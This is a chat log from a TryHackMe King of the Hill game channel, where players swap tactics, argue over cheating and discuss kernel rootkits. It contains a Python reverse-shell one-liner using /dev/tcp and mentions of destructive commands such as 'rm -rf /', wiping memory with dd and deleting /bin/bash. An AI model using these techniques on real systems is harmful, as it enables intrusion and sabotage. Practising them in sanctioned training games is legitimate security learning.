#koth

but you said i was dirty that usually means cheating 😂 🤣

my main language isnt english so idk what context that was in

you just came out and said i was dirty

👍

My main isnt english too, nah dirty was meant with using chattr and than deleting it or whatever u did to make it unusabable😂

dont you have a copy of chattr 🧐

you should keep one

I tried to reinstall it on the Target but it didnt work

https://github.com/posborne/linux-programming-interface-exercises/blob/master/15-file-attributes/chattr.c compile this static and then get it into your machine.

You can run private Matches solo to train right?

not sure ¯_(ツ)_/¯

but you can do some koth machines as normal ctf rooms from tryhackme

like food for example

Yeah i already marked these 2 for me

No, you have to have at least two people for the machine to start. You can queue it solo, but it will terminate if there are not enough people (at least the ones I've tried).

Nope, need two ppl for machine to start... If you want to practice I can join your private match, I won't be playing but at least you could enumerate and get familiar with the machines, just send me the link when you're ready

can anyone decrypt it?

´ql´<z,Ód»øHˆku^ˆçìη… ˜T>;d-‹ŒÅÒæõv°ÁqþlFÊ€·“Wìù…çüëùê|óéúæ\iã¸]³Æà1Ž$Ö1|ä<î(üî:ØzÛK3ÆÏýÐæG¨b¢‡öº!¾ã|i°0EOÍz•dŽøæ‡á_ÌÏãþD¿°¨¤{¦y³VXåÌëø
÷û;cIxÝ΅?yõ¸¬S¿Á"eÜWüpî/b›óƒ¢èyÞ·¬sÇ:œ\H7Ž¸ÖË©[–0 ÎkÞxŽ˜s;‚àã…ǁ>¶Ýø¯#­<ÐNøŽ•Õ4-ÁÑxZG3aTj/ Ãzw÷Ï¿EfAÕé

https://tenor.com/view/deaf-cat-deaf-aagghh-aagh-cross-eye-cat-gif-4205790747075254931

plz no CRYptography in #koth it makes me lose my mind 🙏

wget https://raw.githubusercontent.com/posborne/linux-programming-interface-exercises/master/15-file-attributes/chattr.c -O chattr.c && gcc chattr.c -o chattr -static && sudo python3 -m http.server 8000

problem solved 👍

i understand the wget, the && is for another command in the same line right? but for what the python web server?

On koth machines you obviously don't have access to the internet, so you can't download anything from outside, you have to download it to your kali vm for example, compile it there, and send it to the koth machine, that's why the webserver

btw, the only binary that can be deleted is chattr, so there is nothing dirty and nothing against the rules in this, it is always good to have your own chattr compiled in case someone removes it from the machine

i never said against rules or sum, its just my way to talk

You can modify the chattr code to write your username every time someone uses it. There was one chattr_borked.c just for this, KoTH.

everyone uses their own chattr these days no one would fall for that 🤣

Yeah lol, worth a try for the first king (root)

Replace theirs with this, they should go crazy😂

👍

I don't even use chattr binary, this works for with ofc, with necessary includes:

ioctl(fileno(fp), FS_IOC_SETFLAGS, 16);

and, fp here is file_pointer to /root/king.txt

this 🚀

yeah, I've found 5 footholds so far in fireworks and 6 flags but 6th one didn't work for me || anyways who places sshot of flag 😩and yeah I'd used OCR and also manually checked value of the flag but it still didn't seem to work ||

idk I've spent around 3 hrs. in fireworks just searching for footholds and 5 were ones I'd found, and maybe there maybe more

just get good with king control and flags doesn't matter anymore

agree

@south pulsar what happened to the machine?

I don't know, I wasn't able to enter the machine

I think someone just shutdown the machine

Is it offline i cant even nmap it or ping but i am not king anymore, rude 😂

Also how did u find the flags i couldnt find any flag.txt file?

Ha ha , cause of shutdown, what's your id ??

Wdym id?

I just deleted all the flags 💀, after i get them all

Thm I'd ??

Nah bro thats rude💀

So rude ,💀

I am JustKev in THM and the Match ID is 103710???

Okkk so you're already king

No, the machine is offline so i dont get points, u won

I think 0xReDrag0n did this

But how ??

The machine connects back to the thm servers to tell them who is king and if the machine cant connect back she cant tell who is king

Ohh I got the answer now

Let's join a different one

Hmm?

Yeah im not doing anything rn, next game maybe

yahh you already playing that

Yeah im in but not playing, needed to do something, now its to late

Deleting flags is against the rules❌

Yahh i know that ,I just make fun of it

U won the round only cause of it but idm that u did it😂

Yahh, btw thanks buddy 🐱

Gave +1 Rep to @sturdy fox (current: #2151 - 1)

Thanks for what?

Gave +1 Rep to @south pulsar (current: #2151 - 1)

@short tusk i already apologize for this

Yea deleted flags is a little dirty especially when playing against newer players.... So here's a little tip, create some notes for every machine you play, when you find a flag add them to your notes for that machine... Then when a player wants to delete the flags you already have them in your notes 😉...

Also if you'd like to play some practice matches so you can enumerate the machines just hit me up, I'll join the match but I won't be playing so you have full range of the machines, do what you like to them ... @sturdy fox

yeah thats a good think but for me its not right yk, its like saving the id_rsa in your notes to access a certain machine.

yeahh thank you for that

Gave +1 Rep to @broken pilot (current: #75 - 87)

also if you rename the king.txt it is not longer recognized and gives no points right? cause today i had someone who named it .king.txt and it was not giving anymore points for being king

What's wrong with that? I see it as good note taking... You would save everything if it was a normal machine... Most players have all the loot saved already anyways... That's why you will see ppl with 58 mins king time lol

Yes if you rename king.txt then you get no points

didnt knew everyone is saving them dangg, im saving commands in my notes for some things thats all lol

I mean the key should be find a way in the machine, document how you achieved this, then next game or if you have control of king, look for another way in, document that... There's at least 3-4 ways in for every game... That way if a player patches the machine you might have a way in that they forgot to patch 🤷🏼‍♂️

same, all thanks to loot I was once king for 59 min. lol

id_rsa of of duku, then net-kit ftp's priv esc then straight king!

@timber vale why you use 2 id!!! while playing koth ?

No, but i know the user of that account personally

He is just strating out in thm

bro don't lie , even a child can guess it , that thease are your id

is this because you cant win with me every game you join with me i destroy you and you are running from the current game cuz you cant get king?

🧐

that is not the first time

first time of what?

no, because you use 2 id , just for cheating

Haha 😂 first i dont use two ids second you just cant get king and how would some other account help me with being king 🤣

just admit i destroy you in every game so you just want to get back at me 🤣

and btw stop using autopwn , play honestly

wtf 🤣 i have the id_rsa key for ashu how is that autopwn 🤣 i just kicked your a** and you just here doing this stuff running from the original game cuz you cant get king 🤣

you use 2 id's , stop thinking that everyone is fool like you

🤣 🤣 do you want a private game or what 😂

you really want ?

come then

😂 i will destroy you like every time

every script kiddy speaks like this

😂 a script kiddie always kick your a** wow 😂

i know youre the mf

come then

🤣 dm me lets choose the game and send me the link i will kick your a**

you have a sub i dont

ok, i dont chuse the game , its a random

what if its windows 🧐

i dont have fears

alright dm me the link

lemme join 😉

for any one who wants to watch the live beef 😂

https://tryhackme.com/games/koth/103748

15 yo boy is going to kick his a**

lets do 3 games who win the most dont bother the other anytime 😂

Let's try to keep it a bit more professional. @timber vale @south pulsar

why you joined and your name inside king?

you distrupting the whole operation you arent inside the game did he dm you the ip 😂

idk u said u'd kick his *ss do it if you can else f right off

so its like that

do what u said, else don't bug around.

i want a proper game just me and him 1v1 dont do this shit to me 😂

u used 2 acc 1st kiddo

you both come play against me and you have your cheating methods with you thats not fair 😂

"do what u said".

wdym cheating methods, stg I didn't use any one lmao

first i dont have two accounts second you cant talk about that you know about what you did to the koth service every body remember that

you're moving away from ur words

haha fun

🤣

i didnt say i want you both i said i want 1v1 and you distrupting the whole thing he must have dm you the ip 😂

you were not able to kick his *ss

😆

tbh, nones fair here

including me

im not even playing after i saw you in the match i dont do this shit

so do what u said

im still saying i will kick his ass but 1v1 without he dming the ip to anyone

ohh u decided to run away, fine

thats cheating what you both are doing im not here for this shit i said 1v1

@south pulsar maybe @timber vale is scared of u

https://tenor.com/view/cats-fighting-fighting-cats-anniehasleftoop-gif-23317332

I dont get scared of buncho of pu**ies

then play.

im not scared of him neither im scared from you anyone wants to play a proper game comeone

i win or i loose but with my dignity and no cheating from your parts

I gave him some of my stuff, maybe he compiled them without editing

yahh he is a fucking kidde

some of your cheatings 😂

that's where u got to see my username

@north wolf i think someone need 9999 fake id's to win a koth

this last 2 weeks i won more games than you two ever won so shut up and close your mouth 😂

idc.

alt acc thingy

and u saying kicking *ss of 15 y.o is what made me share my goddies with him

else, I didn't care

ahem

language.

@mods 😅

Guys, just leave it. Follow the rules from now on and be fair, that's all

@.scrubz. a bit of an issue here😄

Who is the script kiddie now i code my Own stuff to protect king🤣

@near lily

bruh, he's learning. And, I "gave" him. He didn't "ask" for it. FYI.

and he just ran it without understanding it 😂 or knowing what it does

there are proper comments to understand what my code does, and the only part was the username definition within the code which he just prolly forgot to edit

He didn't even take a look at it or else he couldve changed the username 🤣

and someone didn't even care that alts can be identified easily.

chuck it

not talking anymore in this topic.

🤣 i told you that is not my account and you dont have a prove but we all know that you didnt care that cheating can be identified just as easily

btw, biggboss izza watching 😆 (gifs lolz)

haha, funny.

i dont know how you are still even talking here im done with this shit i cant take it anymore 😂

..

Can I join the fun later 🥳 😉... Why everyone so mad???

https://tenor.com/view/panda-bear-fight-gif-13253482156340934104

sure! lmao, You're most welcome!

yahh buddy @broken pilot

i joined a public game with him destroyed him and he came here talking shit about me 🤣 but i dont care he knows what i do to him and i know 👍

We can do it publicly or private don't matter

anyways someone wasn't able to do what s/he said

Personally I don't see how 2 accts would help take king... Only thing multiple accounts are good for would be to spam resets.....

personally i dont even do resets cuz i always win what would i get from that ?

who knows, lets have a competitive game

than arguing here

@north wolf I think you may have misread what ch1 was saying... Ch1 is the 15 yr old...

oops, my bad

Ok when I get off work I will ping you guys and let's orchestrate a big game 😉...

sure!

:mute: c.h.1#0 has been muted.

:mute: 0x_indranil#0 has been muted.

Thanks.

Gave +1 Rep to @placid fable (current: #40 - 185)

i like how silent it is in here now

boom baby

But bruh 0 king points....

yeah but looks like king isnt available cause no one of them rly got points of it

can you see the winner ??

..

Yea I do ... 🥳

...

yep, real game; coming soon!

only on koth!

😆

presented by ?

presented by a bit of beefing (not sure whom to mention here, exactly)
but sure about powered by THM!

ok so lets do it

wait wait, waiting for everyone to get ready

Bruh I'll drop link when I get off work....

exactly, @south pulsar ☝️

Get your stuff ready in the mean time 😜

okk

idk what to get ready, I'll just smoke a cig that's my prep.

https://tryhackme.com/games/koth/join/00eb561e6c45eff5754e0c62

@north wolf @south pulsar @timber vale and whoever else wants to play

15 mins

@north wolf @south pulsar 5min

https://tryhackme.com/games/koth/join/3b4fa8ab8af9031866cc75af

20 mins

I see now why I quit koth, and I don't regret it at all lmao.

Mission: impossible

😆

I'm sorry, I wasn't able to join.

nice, there's at least a guy (always) on koth queue lol

https://tryhackme.com/games/koth/join/5ed0f72b3ca1e1dc69e86360

Why I am not able to join koth ? It's saying not found

are u trying to joing the link from Ch1?

Nah, normal koth but now the problem is solved

And how did you entered in the machine so fast.? @timber vale

you need to upload a rev shell to 5000

a python one

I uploaded a reverse shell.?

yeah thats what i did you need a python revshell to run on that werkzeug server i think

I didn't understand what you mean bro

You mean I need to upload a reverse shell, right.?

i used port 5000 uploaded a revshell

it needs to be a python script 👍

that give you a shell

#!/usr/bin/python3
import os
os.system("bash -i >& /dev/tcp/<ip>/<port> 0>&1")

you can just use that

Okie ty

this happens sometimes to me and some times they say i can only enter two scheduled games at a time when im not even in a game

Yeah thats their limit but i was facing different issue

im recently experiencing other bugs i dont see the type of the machine i need to refresh and the ip also and i need to refresh to update the points like there is no live update on anything

and my koth pagge is also not updating automatically every minute

yeah

you need to refresh

maybe they are doing maintanance as mentioned in the notification bar

yea

i just stopped using it to monitor king i started using watch -n 1 curl -s ip:9999

Ooo

but the problem is resets when some one reset and the machine doesnt shutdown you can never know without refresh

ip of our openvpn or ..??

no the ip of the machine the koth service running on port 9999 tells you the king

oh

It's not even a flex buddy, go touch some grass or find a job

yeah i got nothing else to do i train i go to the gym but this is my vacation and i dont have school so i have full time koth 😂
you're not gonna get rid of me that easily i will continue to be in every single game each time i can 😂 to take the win from you

@violet zealot @fair adder

From who? I don't play koth anymore

Does someome know if bluez8866 is cheating?

I am in the shrek machine with him, he kept killing my connection and now he turned ssh off after making himself king 💀

Ssh doesnt show on the ports anymore and i get the error connection refused, but somehow he is still connected, someone tips?

Well a good technique would be to add some kind of persistence once you get on the box that way you won't need ssh. You could also try scanning again for all ports maybe he changed ssh port. There should also be another way on the machine besides ssh if he hasn't already patched

All the ways, as far as i know for the shrek machine, leave ssh keys, no i scanned all ports and only 22, it said closed ssh.

@north wolf I thought youre a changed man?

does that remove the shell or what exactly?

it removes the built in bash binary

so the shell

lmao

Depends, if /bin/sh is still there you can use that

Or any other shell, like on debian(based) systems /bin/sh is a symlink to /bin/dash iirc, so if they didn't remove all binaries it's likely that only the symlink /bin/sh is removed and /bin/dash can still be used.

Where can I find the linux headers for the food machine? (4.15.0-91-generic)

/bin/sh exists.

btw, thanks to you since you motivated me to write a rootkit

Gave +1 Rep to @civic vortex (current: #881 - 4)

but u can't remove the bash

im pretty sure it's against the rules

my bad

but my rootkit makes me wonder since there's no king.txt in /root but cat /root/king.txt responds fine

anyone? https://tryhackme.com/games/koth/join/9e1669bbd2bdfa0cc53edcce

How do I compile my LKM for the food machine? Where can I find the headers

if u are talking about the linux versions, im pretty sure matheuz or someone else shared them

.

mods should pin it for further related questions 👍

yaay! now my rootkit works as expected, but idk why i see two usernames lol

anyone? https://tryhackme.com/games/koth/join/6afa7483701c62c824ce061a

@south pulsar @upper basin @timber vale @broken pilot ?

im eating dinner rn

im going to play with you the next game after 20min

I meant how to actually compile them. Iknow the version

then idk what u mean by that, u just have to compile with gcc or anything else?

Mistapped sorry

I have to compile the lkm using the 4.15.0-91-generic headers. I have installed the headers but when i try to make i get an error bc the compiler is trying to access the asm directory gut in the headers its named asm-generic. And no linking doesnt work

https://tryhackme.com/games/koth/join/3d27c9c05ff242d4ac0c377c

@north wolf

@north wolf may i dm you

sure

Cause u can put multiple things in a text file?😅

https://tryhackme.com/games/koth/join/3c524a3f80517e8da088a805

@timber vale wth did yoy do to that king file ?? 😂😂 good game

GG

what is your username?

@sour lodge

MrMarket

https://tryhackme.com/games/koth/join/d94a17f1e3941fb804167b58

https://tryhackme.com/games/koth/join/6b7a65705369c245b50990e8

https://tryhackme.com/games/koth/join/41bf12576ab99092d82e9279

https://tryhackme.com/games/koth/join/aa951b753e60a08d8b32a1f0

@north wolf

https://tryhackme.com/games/koth/join/00e0f0445cf0d01313158b8c

https://tryhackme.com/games/koth/join/35b99548e8259c93e287b89f

https://tryhackme.com/games/koth/join/71c38cac0c5b183b09279747

https://tryhackme.com/games/koth/join/e6497ec8c19889e0ee956ba8

@quiet schooner can I DM you about koth?

https://tryhackme.com/games/koth/join/c829eb9db661d13599c77af9

https://tryhackme.com/games/koth/join/bec4c602826b227c21ad7edf

https://tryhackme.com/games/koth/join/8fd22bffea9b8e0bf9fdf29f

Bro fr what is Bluez doing??? He got in the machine again and turned off the ssh

I think he even deleted ssh cause there is no ssh anymore💀

are you talking about shrek machine ?

23 king changes 😄

https://tryhackme.com/games/koth/104221

Yes

Yeah i got in from a reverse shell and he wouldnt let go xd

Ohh u were in the Match too

not me. maybe Binary exploiter

Yeah i meant him

setup your persistence

yea but actually he just broke the rules a second time (or more)

so maybe mods can take some actions, because tbh i see many people cheat but nobody gets banned

I guess it would all boil down to what is considered a bannable offense.. like changing the executable permissions on say /bin/bash is technically against the rules but would this constitute a ban?

Anyone from NSW?

if it's repeated, yes

if u broke the rules just once, it's okey but if u cheat like every game u should be banned

But then again this is an easy fix ... chmod +x /bin/bash ....

it's not because u can fix it that u can do it

Yea but should you be banned for that...

again, if it's once no, but if u do it repeatedly then yes

otherwise what's the point of having rules?

Now I can see rm -rf / or modifying koth binary or attacking others players being bannable

everything that is against the rules should be bannable, even more if you repeat it.

i only played against him 2 times and he cheated both times idk if he does it all the times. i reported him both times now, im just not gonna go in a game where he is inside.

but you also have to keep in mind that changing the ssh port is not against the rules, if you do the port scan again, you will see the ssh port

if that's the case

yes i know, i scanned multiple times, i also only scanned 22 and it said "22 - SSH - closed"

Did you scan with rustscan or nmap? need to see all the ports

both, im not that familiar with rustscan so i normaly scan all ports with rustscan and than nmap -A with all the opened ports

or in that case with the closed port

so you didn't scan all ports... you need to use -p-

for scan all ports

by default nmap does not scan all open ports

oh, it doesnt?

Yeah, nmap does not scan "all" open ports, so you need use -p-

for nmap yes, what i do is rustscan -r 0-65000 after that nmap -p (all the ports from the rustscan) -A

it does only scan the first 1000

guessing that the first 1000 are the most common ports?

yes, thats why people sometimes change the ports, so u need to recon more

I can see blatantly cheating being cause for ban under certain circumstances... But I think there are some grey lines in the rules and it would then depend on the perspective of what is actually considered cheating... Cuz rm /bin/bash no problem can still use sh... rm -rf / ... Problem that was blatantly used to ruin the machine for everyone .... Blocking ip's using iptables.... Blatantly breaking rules... Alias on echo... Sneaky... Can still change alias and machine is still up... All depends

yeah every case is different but in my opinion closing the ssh port while u can just change the keys, on a machine where 90% of the ways to get in via ssh are is just not rule conform.

I've seen people ruin all the machine's memory with dd

What does that even achieve, it ruins the match for everyoje

but he wins 😉

Its called being a huge dick

yee

If you're still in the machine it's a good idea to do something like systemctl status sshd because usually that reveals the new port and if ssh is still running or just stopped

no it was a few hours ago, i got in from a rev shell + i think he deinstalled ssh cause i tried that status thing and it coulnd find it + all the .ssh directorys in the users got deleted

But this also demonstrates the importance of persistence... There are other ways in the machine besides ssh... Bet they didn't patch all of them...

also bluez keeps disconnecting the users, so if u play against him be aware of that 😉

Like killing your shells?

yee

yeah i know i worked on that, got in from a web rev shell but he had a loop or something cause i couldnt get his name out of king.txt

Add some persistence, and do it back 😉

Flood his terminal with urandom make him kill his own shells 🤣

i know what u mean but bro im a noob idk how to do all that xd

So now that should make you want to look into the running processes...

i know how to get in the machine but idk how to keep them yet

That's the point tho... Sure it might be annoying but by going through it you will learn how to defend against it...

ps aux right? cause i looked at it but i coulnd find anything or i just didnt see it, there was something called sleep 1 tho

You gotta think in real life situations they are not going to be playing by the rules.... You will need to adapt to the environment you are in 😉...

Yes, I would even do ps auxf for a forest view... I would also look into sleep 1 cuz that seems suspicious... Look at the process id number of sleep 1 and kill it... Try adding your name to king did that work if not inspect processes again

Could also use something like pspy64

whats that?

It's a process watcher, to monitor what other players are doing
https://github.com/DominicBreuker/pspy

If you're around later I may play a couple games tonight... Can show u a few tricks if you're interested.

https://tryhackme.com/games/koth/join/2b487691a00ee3d02a5ab21a
if anyone interested

didnt planed anything for today, yet. should go, but what is ur timezone? cause its 6:30pm for me

Ahhh ok it will probably be late for you then... Maybe over the weekend just ping me

tell me when u play i will be awake for at least 6 more hours xd

Ok It will be at least another 5 hrs... Would probably be best to shoot for the weekend. That way you can take some notes and benefit from the games...

KOTH? Anyone? Huh?

I'm tired of @timber vale destroying every KOTH I'm a part of haha.

its 3:12 am im going to sleep but i will play with you tomorrow if you want 👍

Bro...just oversleep for a bit so I can at least get the false impression that I may win.

i will stay sleep for at least the next 8-9 hours so you can play all you want rn 😂

Free after like 3 hrs?

Ehhhhh I’ll probably be in bed

Ah alr

crazy how everyone is in a different timezone

any one having problems with vpn?

i tried changing servers and redownload configuration but it just doesnt connect
my internet is good my ping for google.com is 73ms
2024-08-03 08:02:31 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:02:31 VERIFY EKU OK
2024-08-03 08:02:31 VERIFY OK: depth=0, CN=server
2024-08-03 08:03:32 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
2024-08-03 08:03:32 TLS Error: TLS handshake failed
2024-08-03 08:03:32 SIGUSR1[soft,tls-error] received, process restarting
2024-08-03 08:03:32 Restart pause, 1 second(s)
2024-08-03 08:03:33 TCP/UDP: Preserving recently used remote address: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 Socket Buffers: R=[212992->425984] S=[212992->425984]
2024-08-03 08:03:33 UDPv4 link local: (not bound)
2024-08-03 08:03:33 UDPv4 link remote: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 TLS: Initial packet from [AF_INET]54.76.30.11:1194, sid=d472c3c2 ffd9599d
2024-08-03 08:03:33 VERIFY OK: depth=1, CN=ChangeMe
2024-08-03 08:03:33 VERIFY KU OK
2024-08-03 08:03:33 Validating certificate extended key usage
2024-08-03 08:03:33 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:03:33 VERIFY EKU OK
2024-08-03 08:03:33 VERIFY OK: depth=0, CN=server

this whole log gets repeated over and over again without connecting to anything

PING google.com (142.250.201.174) 56(84) bytes of data.
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=1 ttl=128 time=73.2 ms
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=2 ttl=128 time=73.4 ms
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=3 ttl=128 time=73.4 ms

Hey @glass isle u in yet?

nope

i only have mysql flag

ssh is down or smth

port 58342

yeah H4DES is a strong player

i didnt rescan all ports after finding all

i got a ssh user from sql database so ill try

pw got changed

gotta go... goodluck @sturdy fox

yeah Match is over xd

gg hades

https://tryhackme.com/games/koth/join/99b65534a26bb2ca58637a34

gg

I was just installing Docker on my host to escape the containers 😂
How did you do that? Plain curl?

Jumping on for a few quick games before I go back to my CySA + studying that isn't going too well 😂 https://tryhackme.com/games/koth/join/a761ef206a3e7f0607d4befe

Check out hacktricks docker escape

aliali..0541, why are you killing the login sessions? And, the /home/ashu/flag.txt has root:root user/group. This is against the rules

who is bluez?

exactly.

looks like someone who doesn't like to follow the rules, hence would like to have a match against him

did someone already change http admin page PWs? 😮

oh what happened to u with him? 👀

Hey kaali01🙌🙌🙌

Really changing passwords is allowed?

yes

why shouldnt it be?

Then if I am unable to find the root first then it's like done

I can't do anything one who becomes king is king

having the passwords is normaly not the way to get root, as far as i know

There are obviously other ways to get into the machine, other than just SSH logins or web logins

that attitude won't get you very far for koth, other vulnerabilities on the box exist

every one is having fun in koth without me 😂 i reinstalled the whole vm but im still cant connect to any openvpn not thm nor htb have fun guys 👍

same problem

i tried a new vpn server and redownloading the configuration that didnt work also. did you try it?

I tried every single VPN server in the THM access page.

yeah i did that too but nothing changed
i will try to reinstall my vm but this time test htb first see if it works cause my htb vpn was working fine before this
first time my vpn malfunctioned i restarted my machine and i found that the configuration in /etc/network/interfaces for eth0 is deleted
i restored that but also couldnt get network access cause when i do ip route i see nothing so no route i fixed that but nothing changed

how long is the Match Penalty?

oh different website

Check if your host machine is using VPN through Anti-virus or if you seperate VPN tool.

i use kaspersky but i never got that problem before

There is no harm checking. It may be updated.

yeah i will do that but i dont have my laptop rn.

🤣 🤣 🤣 not cool to remove binaries.... how you gonna take king from me now 🤣 🤣 ..... aliali..0541 ....

hahahahaha you tried to mount and remove both mount and umount..... but now it has backfired on you 😉 Good Luck have fun 😜

hahahahahhaha weak bro .... you didnt have to poweroff the machine

anyways GG see ya next time

This guy didn't follow the rules last time I played with him

yea he was still playing dirty against another player so i decided to step in and take control... he got mad and shutdown machine 🤣 🤷‍♂️ ..

they are so funny, turning off machine to help us secure king

@broken pilot would open sourcing my rootkit break the game

i still think rootkits are cheating

How

Since it's not breaking the rules it gives you the complete freedom of using a rootkit yourself

Now I can see why it could be considered as cheating but it's not

I mean a rootkit is autopwn and autohardening isnt it?

If it was they could've locked the kernel to prevent LKM rootkits.

Not really autopwn. How will you autopwn something if you're root alr. About autohardening, sure but if that's auto-x how isn't using the mount trick or other one liners the same

Cause the auto thing is that makes it cheating, if u use the commands on ur own okey but having a programm which does all that for you is something different yk?

But im sure THM knows about rootkits getting used and if they dont do something ig do it

So if I put the commands in a sh file it's suddenly considered auto?

While copy pasting them isn't

idk that is the thing, what exactly is autopwn and autohardening

cause for me auto means that for example a programm does it for me

Then how come you dk? You just answered my question

everyone has its own opinion about it thats what i meant

So you do think that putting the commands in a script instead of copy pasting them directly in your shell is considered autopwn

Well, if you have mixed up definitions how come you say rootkits are autopwn

thats why i said at the beginning "i still think"

I also said "so you do think"

yes

Autopwn: a script that gives you a root shell with only the ip, autoharden is imo about patching vulnerabilities

That sounds pretty wrong, give it a second read

Not trying to argue here, just so you know

and a rootkit gives you root with just ip doesnt it? i heard players have rootkits for the machines, so they only put in ip and they won

Huh

Define a rootkit

A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software.

So no, you need a foothold in the machine and rootkits are meant to provide a backdoor. Not to gain initial access.
In our scope, koth, rootkits are loaded after you become root, to manipulate kernel space functions to protect the king

Generally speaking

Ok, so that's the misunderstanding here

Yup. A huge one

i know what u mean but i also know that players have what they call rootkit, a programm where u just type the ip and maybe the machine type from koth and they have king, cause the machine have the same vulns but they change a bit. so what i meant is, there are many players which have programms where they dont need to do anything except typing the IP to win.

That's not a rootkit albeit the definition for rootkit on Wikipedia is a bit misleading. These programs are autopwns. Rootkits are not autopwns

@fading moat out of wonder where you able to make your own write_hook?

A write hook is practically useless here ;)

wdym by useless?

Think better, why would a write hook not be the best option

Hey @broken pilot wyt about what I said on open sourcing my kit

Idk honestly, it's looking like more and more people are using rootkits to control king.... At some point it's just going to become who has the better rootkit.... But I'm also noticing that this is the main way some ppl control king... And if we created a game where no rootkits could be loaded I'm wondering if they would still be able to control king or would this make it a fair match.. cuz when you use a rootkit on a newer player, it could make them no longer want to play or resort to cheating.... I think rootkits should be last option when playing against better players instead of used on every single game against every player....

I see wym. But since you put it this way, open sourcing rootkits will help new players develop their own, or understand how to defeat them (less likely). I don't necessarily see why the game shifting towards the use of rootkits I'd a bad think

I mean there isn't only 1 way to skin a cat but write hook sounds kinda kinda great to hook from other sys_calls and tbh I didn't took a look in sys_calls to know which is the best to hook so far.

Thing*

When you do, you'll start laughing

Depends on what quality of a skin you're going for ;)

A game without rootkits would probably mean that the one that has the most resource intensive script will win so idk if it would be a fair game.

True, open sourced rootkit could be used to learn how to implement and could get a bunch of ideas to improve it (not a bad thing)... But just like everything else it could also enable ppl to abuse this .. so I think if you release an open source rootkit just don't make it unstoppable....

Yea but scripts are a lot easier to find and stop than rootkits....

Yeah my rootkit is relatively unstoppable

We would know better if you test it sometime ;)

True, but it would mean that a lot machines will crash, if it's a rootkit you just have to find a loophole or remove it when possible.

How'd they crash tho

So now think if everyone had it and all played at once 🤣🤣🤣🤣... Id release like a public version and hold on to the unstoppable one

Have to tried bypassing a rootkit?

I will get to it 🤣 I forgot over the weekend... I may play a game tonight I'll ping you and we can test it out

Yeah

It's possible, just find an edge case

Were you successful?? It's a lot harder than finding a loop hole in a script or just killing the PID of the running script...

But I only did this with one rk, so idk about other's

Just start the food practice game and send the ip

Yeah, a few times

I'll be home tonight

I'm not at a comp rn. But when I get to the house I will

Yeah fs

Currently hitting some biceps

Mid set rootkit discussion is elite

Ok, good job. Was it as easy as running ps auxf and killing script??

It's actually very easy to detect your rootkit, craig the creator of Agentless Linux Security also agrees with this, the problem itself is just adding correctly to lsmod, restoring completely, which I can't work on at the moment because I have other issues To resolve this, don't think you're a god because of this, just copy & paste what already exists on the xcell blog, among others 😄

Not really, you can try it yourself. You're still trying to prove something. Grow up, it's not everything about you.

How do you know without seeing the source code 🤔

I'm not trying to prove anything, I'm just saying reality

Sure bud, nice one

But creating a tool from scratch to detect and remove rootkits, try it, because making a rootkit is easy, you can just look at xcellerator 😝

developing new tricks for defense

No, it took lots of time and trial and error to find a way to bypass one, but it's not impossible

For you, it might be just that. Not all are just copy pasting stuff they find;)

Nah, you said it yourself that the xcell blog helped a lot

This guy 😂 does it mean I just yanked everything I found on there

I just said the reality, your rootkit is not unstoppable, it never will be, and next to an EDR/XDR agent for Linux, your rootkit seems like a toy to deal with 😄

Again, you're trying to prove something. Calm down

What would you care

nothing is unhackable you know

That's my point tho... I know it's possible to bypass, I've bypassed many but for a new player it could seem impossible... The goal should be to get new players excited to play and keep them coming back

Saying "My rootkit is unstoppable" and having a counter argument applied then saying "you're trying to prove something" is terrible arguing.

Really it's tit for tat.

True, it was a bit of a personal challenge for me to defeat it, otherwise I probably would've given up.

I said relatively. Second of all, matheuz is for some reason obsessed with trying to prove me wrong like I have done something to him. I had already informed @sonic belfry for him dming me out of the blue starting to make fun of my projects with no apparent reason

No point bringing Tim in to this, and I'm not saying matheuz is innocent either.

You both need to cool it, if you don't have anything nice to say, probably best you just stop.

? You were the one who started all this in the f11snipe chat, wanting to call my project and research something completely useless, first of all, you didn't even know how it worked

everyone saw this

tagging me there

If you hadn't started all this there in the f11snipe server chat, I would still not know of your existence

I can relate that's how I figured a bunch of ways to bypass them was just a personal challenge... But not everyone thinks this way... I try to find the newer players and teach them a few techniques to be able to compete, to keep the game alive... If everyone is using rootkits wouldn't be as fun IMO...

There is, he told me to let him know if he acts the same. Also, how is it tit for tat, I never said anything personal lol. And matheuz seemed to confuse my criticism towards his lkm detection from the start which made him turn aggressive against me. It was never my goal and he is keeping at it

Once again with your inflated ego. I literally don't care if you didn't acknowledge my existence. How's that a point

Im not asking, I'm tell you both to stop before I mute the pair of you.

Please stop trying to make fun of me, it's annoying and doesn't look good for you. Please

Aggressive towards you? lol, at no point was I like that, you're telling lies, if you want you can even enter the f11snipe chat and see the messages, you're the one who started all this, I was quiet in my

This is why we can't have nice things guys 🤣🤣🤣🤣 just playing...

Sure go ahead, this is a fucking joke. The dude is harassing me for no reason and somehow I'm at fault? Lmfao funny

I was aggressive towards you? lol, I even tried to help you understand what imperius did

Sure buddy

I dont care anymore

Are you acting like a poor thing now? lmao

sure

You'll get us both muted

:mute: anti_sysadmin#0 has been muted.

So kindly stop talking

You do realise you were part of this conversation too, right?

You're in no way innocent.

Didn't I stop talking

No?

You kept talking

Huh

Reading all that rootkit talk, surprisingly I started working on one last night 😆

Lemme know when you guys are connecting, happy to learn something : )

Good luck mate. Feel free to DM me if you want to talk about rootkits. Let's learn from eachother

Thanks : )
It's all academic, I have studied the xv6 system in uni, it was great. I don't know much yet, around the actual Linux kernels. So, I will be learning from you guys : p

Gave +1 Rep to @fading moat (current: #1092 - 3)

Interesting! I am new to this too, first stumbled upon xcellerators awesome blog to get me started, then I got around by reading through kernel source code (elixir bootlin my beloved) and the help of some awesome guys over at tmp.out, had a lot of problems in the way but managed to get through.

And I discovered some very interesting techniques on the way

eBPF is also a good way to hook syscalls 😄

That's great, elixir is just OG

Packet Filter?

https://medium.com/@luishrsoares/developing-ebpf-hooks-first-steps-58e1e82999a0

Yeah

